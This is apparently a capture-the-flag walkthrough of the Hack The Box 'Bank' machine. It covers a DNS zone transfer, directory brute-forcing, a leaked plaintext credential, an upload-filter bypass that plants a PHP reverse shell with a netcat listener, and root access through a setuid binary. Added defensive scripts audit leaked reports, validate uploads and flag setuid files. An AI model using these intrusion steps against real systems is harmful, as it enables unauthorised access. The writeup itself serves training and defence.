As usual, I started the initial enumeration by running a port scan using nmap looking for open ports and running services.
```
┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ nmap -sC -sV -oN nmap/initial 10.10.10.29
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-06 11:07 IST
Nmap scan report for 10.10.10.29 (10.10.10.29)
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.13 seconds
```
We have three open ports: SSH on port 22, DNS on port 53 and an Apache httpd web server on port 80. Let's start the enumeration with port 53.
DNS - TCP/UDP 53
The nmap scan does not give us any hostname, so I guessed that it might be bank.htb, and it works! The server answers a zone transfer (AXFR) request from an arbitrary client, so the whole zone, including the other hostnames, is handed to us.
```
┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ dig axfr bank.htb @10.10.10.29

; <<>> DiG 9.18.1-1-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.       604800  IN  SOA    bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.       604800  IN  NS     ns.bank.htb.
bank.htb.       604800  IN  A      10.10.10.29
ns.bank.htb.    604800  IN  A      10.10.10.29
www.bank.htb.   604800  IN  CNAME  bank.htb.
bank.htb.       604800  IN  SOA    bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Mon Jul 11 16:52:40 IST 2022
;; XFR size: 6 records (messages 1, bytes 171)
```
I added all the hostnames to my /etc/hosts file.
```
┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts
127.0.0.1   localhost
127.0.1.1   kali
10.10.10.29 bank.htb chris.bank.htb ns.bank.htb www.bank.htb
```
When we visit the URL http://10.10.10.29/ in our web browser, we get the default Apache installation page.
But if we visit http://bank.htb, we get a different website this time, because the virtual host is selected by the Host header.
We have a website with a login form that runs on PHP. I tried logging in using some default credentials, but they didn't work. I also tried bypassing the login page using SQL injection, but that didn't work either.
Next I performed a gobuster scan to look for hidden files and directories.
```
┌──(madhav㉿kali)-[~/ctf/htb]
└─$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/login.php            (Status: 200) [Size: 1974]
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/server-status        (Status: 403) [Size: 288]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
===============================================================
Finished
===============================================================
```
We got many files and directories, but we cannot access most of them because they redirect us back to the login page. However, the /balance-transfer directory is accessible to unauthenticated users.
The /balance-transfer directory contains many files with the .acc extension, each holding an encrypted username and password. One of the files has a noticeably different size, and it contains the username and password in plain text.
```
┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: email@example.com
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
```
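The two things that gave this report away were the explicit `--ERR ENCRYPT FAILED` marker and a file size unlike the rest. From the operator's side, that is exactly what a periodic audit of the report directory should look for, so that a failed encryption run is caught before the directory is ever exposed. The script below is an added example written for this writeup, not code from the HTB machine or the author's tooling; the sample reports it builds are constructed stand-ins (the `++OK ENCRYPTED` header and the padding are invented, only the leaked-report layout follows the file shown above).

```python
"""Audit a directory of .acc account reports for ones that leaked plaintext.

Added example for this writeup; not part of the HTB machine or the author's
tooling. A report is flagged when it carries the failed-encryption marker,
when an unencrypted credential field is visible, or when its size is far
from the median size of the batch.
"""
import os
import statistics
import tempfile

MARKER = b"--ERR ENCRYPT FAILED"
CREDENTIAL_FIELDS = (b"Password:", b"Email:")


def scan_reports(directory, size_tolerance=0.10):
    """Return a sorted list of (filename, reason) for suspicious .acc reports.

    size_tolerance is the fraction of the median size a file may deviate by
    before it is reported as an outlier.
    """
    names = sorted(n for n in os.listdir(directory) if n.endswith(".acc"))
    if not names:
        return []
    sizes = {n: os.path.getsize(os.path.join(directory, n)) for n in names}
    median = statistics.median(sizes.values())
    findings = []
    for name in names:
        with open(os.path.join(directory, name), "rb") as fh:
            data = fh.read()
        if MARKER in data:
            findings.append((name, "encryption-failed marker"))
        elif any(field in data for field in CREDENTIAL_FIELDS):
            findings.append((name, "plaintext credential field"))
        elif abs(sizes[name] - median) > size_tolerance * median:
            findings.append((name, "size outlier"))
    return findings


def build_sample_dir():
    """Create constructed sample reports (not real data) in a temp directory.

    Five 'healthy' reports of identical size, one report whose encryption
    failed (layout copied from the writeup, values replaced), and one
    truncated report with no marker at all.
    """
    directory = tempfile.mkdtemp(prefix="acc-audit-")
    # Constructed stand-in for an encrypted report; the real format is unknown.
    encrypted = b"++OK ENCRYPTED\n" + b"A" * 500 + b"\n"
    for i in range(5):
        with open(os.path.join(directory, f"report{i}.acc"), "wb") as fh:
            fh.write(encrypted)
    leaked = (
        b"--ERR ENCRYPT FAILED\n"
        b"+=================+\n| HTB Bank Report |\n+=================+\n\n"
        b"===UserAccount===\n"
        b"Full Name: Example User\n"
        b"Email: user@example.com\n"
        b"Password: [constructed placeholder]\n"
        b"===UserAccount===\n"
    )
    with open(os.path.join(directory, "leaked.acc"), "wb") as fh:
        fh.write(leaked)
    with open(os.path.join(directory, "truncated.acc"), "wb") as fh:
        fh.write(b"A" * 100)  # constructed: a corrupted, undersized report
    return directory


if __name__ == "__main__":
    for name, reason in scan_reports(build_sample_dir()):
        print(f"{name}: {reason}")
```

Run against the real directory, `scan_reports("/var/www/bank/balance-transfer")` or wherever the reports live, the marker check alone would have flagged this file; the size check is there for the case where the encryption step fails without writing a marker.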
We can now use these credentials to log in to the website. After logging in, we are given a dashboard.
Shell as www-data
In the Support section, we have an option to create a new support ticket, where we can also upload files. But when we try uploading a PHP reverse shell, it gives us an error that PHP files are not allowed.
When I checked the source code of the website, I found a comment which says:
This means that we can upload .php files by just changing the extension to .htb. I will be using the reverse shell by pentestmonkey.
This time the reverse shell was uploaded successfully, and we can execute it from the attachment section. Once it runs, we get a reverse shell back on our listener.
```
┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 49072
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 16:59:44 up  7:28,  0 users,  load average: 0.00, 0.06, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
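The upload filter on the box is a denylist: it refuses the literal `.php` suffix and nothing else, while the web server is configured to run `.htb` files through the PHP interpreter, so renaming the file is enough. The example below, added for this writeup and not taken from the HTB machine, puts that weak check next to an allowlist check of the kind a support-ticket form should use. `EXECUTABLE_EXTENSIONS`, `ALLOWED_EXTENSIONS` and the helper names are assumptions chosen for illustration; `.htb` is in the executable set only because the writeup shows the target treating it as PHP.

```python
"""Upload-name validation: the denylist this writeup defeats, beside an
allowlist that does not accept renamed scripts.

Added example, not code from the HTB machine. denylist_accepts mirrors the
behaviour described on the page (only ".php" is refused) and is the weak
variant; allowlist_accepts and stored_name are the hardened replacement.
"""
import re
import secrets

# Extensions a web server may hand to a script interpreter. ".htb" is listed
# because the target's Apache config treats it as PHP (per the writeup).
EXECUTABLE_EXTENSIONS = {"php", "phtml", "php3", "php5", "phar", "htb"}

# What a support-ticket attachment is allowed to be: documents and images.
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "txt"}

# Plain characters only: no path separators, no control bytes, no NUL tricks.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def extensions_of(filename):
    """All extension components, lowercased: 'shell.php.jpg' -> ['php', 'jpg']."""
    parts = filename.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def denylist_accepts(filename):
    """The weak check: refuse only a literal .php suffix, accept everything else."""
    return not filename.lower().endswith(".php")


def allowlist_accepts(filename):
    """Hardened check.

    The name must be made of safe characters, must not be a dotfile (so no
    .htaccess), its final extension must be on the allowlist, and no
    component anywhere in the name may be an executable extension. The
    last rule covers multi-extension names like 'shell.php.jpg', which
    mod_mime can still route to PHP when AddHandler is used.
    """
    if filename.startswith(".") or not SAFE_NAME.match(filename):
        return False
    exts = extensions_of(filename)
    if not exts or exts[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(ext in EXECUTABLE_EXTENSIONS for ext in exts)


def stored_name(filename):
    """Server-chosen on-disk name: random stem plus the validated extension.

    The client-supplied name never reaches the filesystem, so it cannot
    steer the handler or overwrite another attachment.
    """
    if not allowlist_accepts(filename):
        raise ValueError("attachment type not allowed")
    return secrets.token_hex(16) + "." + extensions_of(filename)[-1]


if __name__ == "__main__":
    for name in ("shell.php", "shell.htb", "shell.php.jpg", "statement.pdf"):
        print(f"{name:15} denylist={denylist_accepts(name)!s:5} "
              f"allowlist={allowlist_accepts(name)}")
```

Name validation is only half of the fix: the upload directory should also sit outside the document root, or have script execution switched off for it (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a file that slips past the filter is served as static content rather than executed.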
Next I upgraded this dumb shell to a fully interactive TTY using the following commands:
```
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179
```
Now that we have a fully interactive shell, we can read our user flag present in the home directory of user chris.
```
www-data@bank:/$ cat /home/chris/user.txt
2dca09f*************************
```
I checked for files with the SUID bit set and found an unusual binary.
```
find / -type f -perm -u=s 2>/dev/null
```
We have a file named emergency located in the /var/htb/bin directory. First, I ran the file command to check its file type.
```
www-data@bank:/$ file /var/htb/bin/emergency
/var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
```
It is a 32-bit setuid executable. I tried running this binary, and it dropped us straight into a root shell!
```
www-data@bank:/$ ./var/htb/bin/emergency
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
root
```
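A setuid-root binary under a non-standard path like /var/htb/bin is the kind of thing a host integrity check should surface long before anyone runs it. The `find` command above lists every setuid file; the script below, an added example for this writeup and not the author's tooling, walks the filesystem the same way but reports only the entries a baseline does not explain. `EXPECTED_SETUID` is a constructed, illustrative baseline, not a complete list for any distribution; a real deployment would generate it from a known-good image.

```python
"""Report setuid binaries that are not in an expected baseline.

Added example for this writeup, not code from the HTB machine. The baseline
below is illustrative only; build the real one from a clean install.
"""
import os
import stat

# Constructed baseline: common setuid binaries on a Debian/Ubuntu-style host.
EXPECTED_SETUID = {
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/bin/su",
    "/bin/mount",
    "/bin/umount",
}

# Virtual filesystems that are pointless (and slow) to walk.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_setuid(mode):
    """True for regular files carrying the setuid bit (mode is st_mode)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def collect_setuid(root="/"):
    """Walk root and return {path: st_mode} for every setuid regular file.

    lstat is used so symlinks are judged by their own mode and never
    followed; entries that cannot be read are skipped silently.
    """
    found = {}
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if is_setuid(mode):
                found[path] = mode
    return found


def unexpected_setuid(found, baseline=EXPECTED_SETUID):
    """Sorted list of setuid paths that the baseline does not account for."""
    return sorted(path for path in found if path not in baseline)


def describe(found):
    """Human-readable 'mode path' lines, e.g. '-rwsr-xr-x /var/htb/bin/emergency'."""
    return [f"{stat.filemode(mode)} {path}" for path, mode in sorted(found.items())]


if __name__ == "__main__":
    seen = collect_setuid("/")
    for path in unexpected_setuid(seen):
        print("unexpected setuid binary:", stat.filemode(seen[path]), path)
```

On the box in this writeup the output would contain /var/htb/bin/emergency, since no baseline built from a stock Ubuntu 14.04 image would list it. Run from cron or a config-management agent, the same comparison also catches a setuid bit added to an existing binary, because the baseline is keyed on path and the mode is checked on every run.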
We have a root shell, and now we can read our final flag present in the /root directory.
```
# cat /root/root.txt
83a3cee*************************
```
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Odom Sok.